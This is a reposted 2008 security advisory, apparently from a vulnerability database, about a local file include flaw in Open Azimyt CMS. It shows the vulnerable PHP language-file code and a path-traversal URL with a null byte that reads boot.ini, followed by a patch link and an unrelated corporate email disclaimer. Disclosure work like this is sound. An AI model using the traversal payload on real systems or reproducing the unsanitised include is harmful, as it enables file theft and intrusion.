Local File Include vulnerability in Open Azimyt CMS v0.22 and v0.21, patched on 10.06.200
`
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-026
Application: Open Azimyt CMS
Versions Affected: 0.22 minimal, 0.21 stable
Vendor URL: http://azimyt.net/
Bug: Local File Include
Exploits: YES
Reported: 07.06.2008
Vendor Response: 08.06.2008
Solution: YES
Date of Public Advisory: 16.06.2008
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
Local File Include vulnerability found in script azimyt/lang/lang-system.php
Code
****
#################################################
if(isset($_GET['lang'])){
$_SESSION['lang']=$_GET['lang'];
}
if(!isset($_SESSION['lang'])){
$_SESSION['lang'] = "second";
}
if (isset($_SESSION['lang']))
{
$SystemLangFile = $CFG->admin_folder."/lang/lang-system-".$_SESSION['lang'].".php";
if(!file_exists($SystemLangFile)) exit(ErrorLang::LangFile_not_load);
require($SystemLangFile);
}
#################################################
Example:
http://[server]/[installdir]/azimyt/lang/lang-system.php?lang=../../../../../../../../../../../../../boot.ini%00
Fix Information
***************
Vendor fixed this flaw on 10.06.2008. Patch can be downloaded here:
http://open-azimyt-cms.googlecode.com/files/security_patch.zip
About
*****
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration
testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems with vulnerability reports,
advisories and whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group
mailto:[email protected]
Mobile :
Email :
Web : http://www.sd.zain.com/
--------------------------------------------------------------------------
--------------------------------------------------------------------------
Disclaimer
This communication is intended for the above named person and is confidential and / or legally privileged. Any opinion(s) expressed in this communication are not necessarily those of the Zain. If it has come to you in error you must take no action based upon it, nor must you print it, copy it, forward it, or show it to anyone. Please delete and destroy the e-mail and any attachments and inform the sender immediately. Thank you.
Zain is not responsible for the political, religious, racial or partisan opinion in any correspondence conducted by its domain users. Therefore, any such opinion expressed, whether explicitly or implicitly, in any said correspondence is not to be interpreted as that of Zain.
Zain may monitor all incoming and outgoing e-mails in line with Zain business practice. Although Zain has taken steps to ensure that e-mails and attachments are free from any virus, we advise that, in keeping with best business practice, the recipient must ensure they are actually virus free.
"
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo